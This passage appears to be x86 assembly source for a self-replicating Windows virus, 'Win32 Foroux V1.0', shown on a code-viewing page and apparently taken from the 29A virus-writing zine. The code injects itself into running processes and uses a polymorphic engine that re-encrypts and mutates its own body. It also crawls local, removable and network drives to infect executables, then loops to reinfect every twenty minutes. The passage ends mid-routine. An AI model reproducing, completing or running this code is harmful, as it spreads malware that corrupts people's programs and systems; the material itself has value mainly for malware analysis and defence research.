📄 29a-7.007
字号:
enum_proc:
pushad
call enum_proc_ip
enum_proc_ip:
pop ebp
mov ecx,[ebp+addrCreateToolhelp32Snapshot-enum_proc_ip]
jecxz short enum_proc_0
SUBCALL snap_proc,enum_proc_ip
jmp short enum_proc_ret
enum_proc_0:
xor eax,eax
mov ecx,20000
enum_proc_1:
add eax,4
SUBCALL into_proc,snap_proc_ip
loop enum_proc_1
enum_proc_ret:
popad
retn
enum_proc_end:
;in--ebp->enum_proc_ip
CALLHEADER snap_proc
snap_proc:
snap_proc_ip equ enum_proc_ip
pushad
push large 0
push large 2 ;TH32CS_SNAPPROCESS
call [ebp+addrCreateToolhelp32Snapshot-snap_proc_ip]
or eax,eax
jz snap_proc_ret
push eax
lea edi,[ebp+snapbuf-snap_proc_ip]
mov dword ptr [edi],296 ;size
push edi
push eax
call [ebp+addrProcess32First-snap_proc_ip]
snap_proc_1:
or eax,eax
jz snap_proc_2
mov ecx,[ebp+is9x-snap_proc_ip]
jecxz snap_proc_3
push edi
lea ebx,[edi+9*4] ;->szExeFile
call snap_proc_4
db '\explorer',0
snap_proc_4:
pop edi
SUBCALL str_instr,snap_proc_ip
pop edi
jnz short snap_proc_5 ;If is Win9X,only explorer to infect
snap_proc_3:
mov eax,[edi+2*4] ;th32ProcessID
SUBCALL into_proc,snap_proc_ip
snap_proc_5:
pop eax
push eax
push edi
push eax
call [ebp+addrProcess32Next-snap_proc_ip]
jmp snap_proc_1
snap_proc_2:
call [ebp+addrCloseHandle-snap_proc_ip]
snap_proc_ret:
popad
retn
snap_proc_end:
;in--ebp->enum_proc_ip,eax=PID
CALLHEADER into_proc
into_proc:
into_proc_ip equ enum_proc_ip
pushad
push eax
push large 0
push large 0fffh
call [ebp+addrOpenProcess-into_proc_ip]
or eax,eax
jz short into_proc_2
push eax
xchg eax,edi
mov ebx,400000h
SUBCALL inf_proc,into_proc_ip
call [ebp+addrCloseHandle-enum_proc_ip]
into_proc_2:
popad
retn
into_proc_end:
;in--ebx->image base
;out--ZF not set,is valid PE,ZF set,invalid,eax->PE base
CALLHEADER check_pe
check_pe:
push ecx
xor ecx,ecx
cmp word ptr [ebx],'ZM'
jnz short check_pe_ret
mov eax,[ebx+3ch]
add eax,ebx
cmp word ptr [eax],'EP'
jnz short check_pe_ret
test byte ptr [eax+16h+1],20h ;Is a DLL?
jnz short check_pe_ret
push ebx
mov bl,[eax+5ch] ;Subsystem
and bl,0feh
cmp bl,2
pop ebx
jnz short check_pe_ret
inc ecx
check_pe_ret:
or ecx,ecx
pop ecx
retn
check_pe_end:
;Get the section of a RVA
;in--eax=PE base,edi=RVA to find
;out--edx->section header.VirtualSize,ecx=0 means not found
;if not found,edx=>last section header.VirtualSize
CALLHEADER get_section_of_rva
get_section_of_rva:
push ecx
movzx edx,word ptr [eax+14h]
lea edx,[eax+edx+18h+8-28h] ;->before first section header.VirtualSize
movzx ecx,word ptr [eax+6]
inc ecx
get_section_of_rva_1:
dec ecx
jecxz get_section_of_rva_2
add edx,28h ;->VirtualSize
mov esi,[edx+4]; esi=VirtualAddress
cmp edi,esi ;RVA<VirtualAddress?
jc short get_section_of_rva_1
add esi,[edx]; esi=VirtualAddress+VirtualSize
cmp esi,edi;VirtualAddress+VirtualSize<RVA
jna short get_section_of_rva_1
get_section_of_rva_2:
or ecx,ecx
pop ecx
retn
get_section_of_rva_end:
;Copy and encrypt vir body to infbuffer
CALLHEADER prepare_buffer
prepare_buffer:
pushad
call pre_buf_ip
pre_buf_ip:
pop ebp
SUBCALL poly_start,pre_buf_ip
SUBCALL poly_callsub,pre_buf_ip
SUBCALL poly_blk_encrypt,pre_buf_ip
SUBCALL poly_blk_encrypt_poly,pre_buf_ip
lea esi,[ebp+_start-pre_buf_ip]
lea edi,[ebp+infbuffer-pre_buf_ip]
mov ecx,vir_size
cld
push edi
rep movsb
SUBCALL get_rand,pre_buf_ip
pop edi
lea esi,[edi+prepare_buffer-_start]
mov word ptr [esi-4],dx
call blk_encrypt
xchg dh,dl
lea esi,[edi+main_thread-_start]
mov word ptr [esi-4],dx
call blk_encrypt
popad
retn
prepare_buffer_end:
CALLHEADER poly_callsub
poly_callsub:
pushad
call poly_callsub_ip
poly_callsub_ip:
pop ebp
SUBCALL get_rand,poly_callsub_ip
lea edi,[ebp+_callsub-poly_callsub_ip]
mov dword ptr [edi],000000e8h+(blk_encrypt-call_sub_1)*100h
mov dword ptr [edi+4],0fc76ff00h
test dl,1
jz short poly_callsub_1
mov dword ptr [edi],0e8fc76ffh
mov dword ptr [edi+4],00000000h+(blk_encrypt-call_sub_1-3)
poly_callsub_1:
mov dword ptr [edi+8],0fc46c766h
mov dword ptr [edi+8+4],0ff560000h
test dl,2
jz short poly_callsub_2
mov dword ptr [edi+8],046c76656h
mov dword ptr [edi+8+4],0ff0000fch
poly_callsub_2:
popad
retn
poly_callsub_end:
;in--edx=random
CALLHEADER poly_blk_encrypt
poly_blk_encrypt:
pushad
call poly_blk_encrypt_ip
poly_blk_encrypt_ip:
pop edi
add edi,blk_encrypt-poly_blk_encrypt_ip
test dl,1
jz short poly_blk_encrypt_1
poly_blk_encrypt_@1 equ $
mov bl,[edi]
xchg bl,[edi+1]
xchg bl,[edi]
poly_blk_encrypt_1:
poly_blk_encrypt_@2 equ $+1
mov bx,5f56h
mov word ptr [edi+2],bx
test dl,2
jz short poly_blk_encrypt_2
poly_blk_encrypt_@3 equ $+1
mov bx,0fe8bh
mov word ptr [edi+2],bx
poly_blk_encrypt_2:
mov dword ptr [edi+blk_encrypt_@1],0f59006ah
test dl,4
jz short poly_blk_encrypt_3
mov dword ptr [edi+blk_encrypt_@1],0f90c933h
poly_blk_encrypt_3:
poly_blk_encrypt_4:
popad
retn
poly_blk_encrypt_end:
;in--edi->offset poly_blk_encrypt
CALLHEADER poly_blk_encrypt_poly
poly_blk_encrypt_poly:
pushad
call poly_blk_encrypt_poly_ip
poly_blk_encrypt_poly_ip:
pop ebp
lea edi,[ebp+poly_blk_encrypt-poly_blk_encrypt_poly_ip]
mov esi,edi
call blk_decrypt
SUBCALL get_rand,poly_blk_encrypt_poly_ip
and dl,3h ;only take four common reg,eax,ebx,ecx,edx
mov al,dl
shl al,3
and byte ptr [edi+poly_blk_encrypt_@1+1-poly_blk_encrypt],0c7h
or [edi+poly_blk_encrypt_@1+1-poly_blk_encrypt],al
and byte ptr [edi+poly_blk_encrypt_@1+3-poly_blk_encrypt],0c7h
or [edi+poly_blk_encrypt_@1+3-poly_blk_encrypt],al
and byte ptr [edi+poly_blk_encrypt_@1+6-poly_blk_encrypt],0c7h
or [edi+poly_blk_encrypt_@1+6-poly_blk_encrypt],al
mov al,dh
and al,3
and byte ptr [edi+poly_blk_encrypt_@2-poly_blk_encrypt],0f8h
or [edi+poly_blk_encrypt_@2-poly_blk_encrypt],al
shl al,3
and byte ptr [edi+poly_blk_encrypt_@2+5-poly_blk_encrypt],0c7h
or [edi+poly_blk_encrypt_@2+5-poly_blk_encrypt],al
SUBCALL get_rand,poly_blk_encrypt_poly_ip
mov al,dh
and al,3
and byte ptr [edi+poly_blk_encrypt_@3-poly_blk_encrypt],0f8h
or [edi+poly_blk_encrypt_@3-poly_blk_encrypt],al
shl al,3
and byte ptr [edi+poly_blk_encrypt_@3+5-poly_blk_encrypt],0c7h
or [edi+poly_blk_encrypt_@3+5-poly_blk_encrypt],al
mov esi,edi
call blk_encrypt
popad
retn
poly_blk_encrypt_poly_end:
CALLHEADER poly_start
poly_start:
pushad
call poly_start_ip
poly_start_ip:
pop ebp
SUBCALL get_rand,poly_start_ip
test dl,1
jz short poly_start_1
mov eax,[ebp+_start_@1-poly_start_ip]
xchg eax,[ebp+_start_@2-poly_start_ip]
xchg eax,[ebp+_start_@1-poly_start_ip]
poly_start_1:
lea esi,[ebp+_start_@3+1-poly_start_ip]
and dl,3
and byte ptr [esi+2],0f8h
or [esi+2],dl
shl dl,3
and byte ptr [esi],0c7h
or [esi],dl
and dh,018h
add esi,main_enter-_start_@3 ;esi->main_enter+1
and byte ptr [esi],0c7h
or [esi],dh
add esi,3
and byte ptr [esi],0c7h
or [esi],dh
rol edx,8
dec esi ;esi->main_enter
mov byte ptr [esi],89h
test dl,1
jz short poly_start_2
mov byte ptr [esi],87h
poly_start_2:
popad
retn
poly_start_end:
;*******************************infproc.asm end*****************************
;*******************************mainthrd.asm*****************************
;include mainthrd.asm
CALLHEADER main_thread
main_thread:
call main_thread_ip
main_thread_ip:
pop ebp
if DEBUG
OUTSTRING 'I go in'
endif
SUBCALL get_extra_proc,main_thread_ip
SUBCALL prepare_buffer,main_thread_ip
call [ebp+addrGetVersion-main_thread_ip]
shr eax,31 ;MSB=1 means is Win9X
mov [ebp+is9x-main_thread_ip],eax
sub esp,MAX_DIR_SIZE
cld
xor eax,eax
mov [ebp+goto_enum_proc_pretime-main_thread_ip],eax
mov [ebp+quick_sleep-main_thread_ip],eax
call [ebp+addrGetTickCount-main_thread_ip]
mov [ebp+have_a_sleep_pretime-main_thread_ip],eax
call goto_enum_proc
;Infect module path
mov edi,esp
push large MAX_DIR_SIZE
push edi
push large 0
call [ebp+addrGetModuleFileNameA-main_thread_ip]
call find_str_tail
std
mov cl,0ffh
mov al,'\'
repnz scasb
cld
mov byte ptr [edi+1],0
call enum_path
;Infect all driver
infect_all_driver:
SUBCALL get_rand,main_thread_ip
and dl,3
add dl,'c' ;first try C:~F:
mov [esp],dl
mov word ptr [esp+1],':'
push large ((INFECT_LASTDISK-INFECT_FIRSTDISK) and 0ffh)+1
pop ecx
infect_disk_loop:
mov edi,ecx
push esp
call [ebp+addrGetDriveTypeA-main_thread_ip]
cmp al,3
jc short next_disk
cmp al,4
ja short next_disk
call enum_path
next_disk:
mov al,[esp]
inc al
cmp al,INFECT_LASTDISK and 0ffh
jbe short next_disk_1
mov al,INFECT_FIRSTDISK and 0ffh
next_disk_1:
mov [esp],al
mov ecx,edi
loop infect_disk_loop
;Infect through net
infect_net:
xor eax,eax
call enum_net
;Sleep 20 minutes
push large 60
pop edi
main_thread_wait:
call goto_enum_proc
push large 20*1000
call [ebp+addrSleep-main_thread_ip]
dec edi
jnz short main_thread_wait
jmp short infect_all_driver
db 'Win32 Foroux V1.0'
;stack map
;esp->find file handle
;esp+4->WIN32_FIND_DATA
;esp+4+8*4+size WIN32_FIND_DATA->return address
;esp+4+8*4+size WIN32_FIND_DATA+4->find path
enum_path:
enum_path_ip equ main_thread_ip
pushad
lea esi,[esp+4+4*8]
call copy_path
call find_str_tail
if DEBUG
mov eax,'*.1\'
else
mov eax,'*.*\'
endif
stosd
xor eax,eax
stosd
sub esp,size WIN32_FIND_DATA
lea esi,[ebp+pathname_buf-enum_path_ip]
push esp
push esi
call [ebp+addrFindFirstFileA-enum_path_ip]
inc eax
jz enum_path_ok
dec eax
push eax ;handle of find file
found_one_file:
test dword ptr [esp+4+0],FILE_ATTRIBUTE_OFFLINE or FILE_ATTRIBUTE_REPARSE_POINT or FILE_ATTRIBUTE_SPARSE_FILE or FILE_ATTRIBUTE_TEMPORARY ;dwFileAttributes
jnz enum_next_file_jmp1
lea esi,[esp+4+size WIN32_FIND_DATA+4+4*8]
call copy_path
push edi
call find_str_tail
mov ecx,MAX_PATH
mov al,'\'
stosb
lea esi,[esp+4+4+2ch] ;cFileName
mov eax,[esi]
rep movsb
pop esi
;Check whether the file name is '.' or '..'
not eax
test eax,00002e2eh ;is '..'?
jz short enum_next_file_jmpz
test ax,002eh ;is '.'?
jz short enum_next_file_jmp1
test dword ptr [esp+4+0],FILE_ATTRIBUTE_DIRECTORY
jz short enum_do_fop
;Avoid go into Temporary Internet Files directory,
;because there are too many html files which can't be infected,we must save time
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -